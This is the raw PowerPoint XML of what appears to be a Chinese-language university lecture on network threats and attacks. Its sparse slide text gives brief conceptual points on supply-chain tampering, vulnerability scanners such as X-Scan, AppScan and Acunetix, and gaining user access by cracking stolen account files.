          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379913" y="6407150"/>
            <a:ext cx="2351087" cy="365125"/>
          </a:xfrm>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a:xfrm>
            <a:off x="8647113" y="6407150"/>
            <a:ext cx="366712" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{81556F20-9EF8-4651-B294-D3B86E7C8135}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1383936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066800" y="765175"/>
            <a:ext cx="7543800" cy="971550"/>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981200"/>
            <a:ext cx="754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66800" y="4114800"/>
            <a:ext cx="754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066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4290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05600" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1DB0EB54-B104-48C8-BE1C-5A5605DF6AF4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2030896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rgbClr val="C00000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:extLst/>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
        <p:nvSpPr>
          <p:cNvPr id="8"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extLst/>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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extLst/>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10"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extLst/>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>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00174"/>
            <a:ext cx="4040188" cy="762000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln/>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1500174"/>
            <a:ext cx="4041775" cy="762000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln/>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2285992"/>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6" name="内容占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="2285992"/>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45CA1F53-DDA1-4EF0-A9E1-D01E00B7FF11}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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3C13410D-C0E6-4B31-91FC-0CA71285A5AA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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9A63598B-C029-4E11-99A6-D686B094EFA2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>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A7A34F4A-1983-4C95-8C8A-357F0C0C5D08}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>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表格占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719263"/>
            <a:ext cx="8229600" cy="4411662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" noProof="0"/>
              <a:t>单击图标添加表格</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C5307E4F-B582-4A67-9150-5A7FF4123C2E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"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384"/>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179306"/>
            <a:ext cx="8229600" cy="5214517"/>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extLst/>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22"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extLst/>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18"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extLst/>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="D:\my thesis\dissertation\final\LOGO.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6322422" y="6069812"/>
            <a:ext cx="2786082" cy="788212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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3" r:id="rId12"/>
    <p:sldLayoutId id="2147483715" r:id="rId13"/>
    <p:sldLayoutId id="2147483716" r:id="rId14"/>
    <p:sldLayoutId id="2147483717" r:id="rId15"/>
    <p:sldLayoutId id="2147483718" r:id="rId16"/>
  </p:sldLayoutIdLst>
  <p:transition spd="slow">
    <p:pull/>
  </p:transition>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63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject7.bin"/><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32.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject5.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32.w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9.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6.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject17.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject20.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49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject21.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53.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject23.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56.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.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22.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide172.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23.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.wmf"/></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63.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62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject24.bin"/></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02.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject28.bin"/><Relationship Id="rId12"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image" Target="../media/image66.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject26.bin"/><Relationship Id="rId9"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03.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject30.bin"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.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66.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject33.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject32.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject31.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image" Target="../media/image71.wmf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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2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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第二章</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="副标题 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>网络威胁、攻击与网络协议安全性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8777288" y="6408738"/>
            <a:ext cx="366712" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C7D7243-14D9-4810-858E-7BA307A26B3A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>又称为分发攻击，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在软硬件的生产工厂内或在产品分发过程中恶意修改硬件或软件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340994" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软硬件配置攻击</a:t>
            </a:r>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70A1C510-8A8E-4703-9A1D-14B2E66D28E5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2709450669"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>X-Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>国产自主开发</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完全免费</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比较古老，缺乏维护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167938" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167940"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7941"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557F02-EC46-49D4-857E-0584824B0804}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="983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213" y="1628775"/>
            <a:ext cx="568642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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2378012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box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="7"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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IBM AppScan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168962" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168964"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8965"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D57775C-5E49-4813-AE96-8102F70B32AA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16896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2168525"/>
            <a:ext cx="73279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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332730160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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>优秀的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全测试软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169986" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Web Vulnerability Scanner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1699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1304925"/>
            <a:ext cx="6659563"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101CFA4D-BBC3-4E67-AF7D-655A58EA6F8E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>102</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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2309484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988"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="169988"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1699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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>设法盗窃帐户文件，进行破解，从中获取某用户的帐户和口令，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>也可利用某些工具或系统漏洞登录主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167938" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获取目标主机的一般权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D9865A22-6078-461C-8347-26764E1030A3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
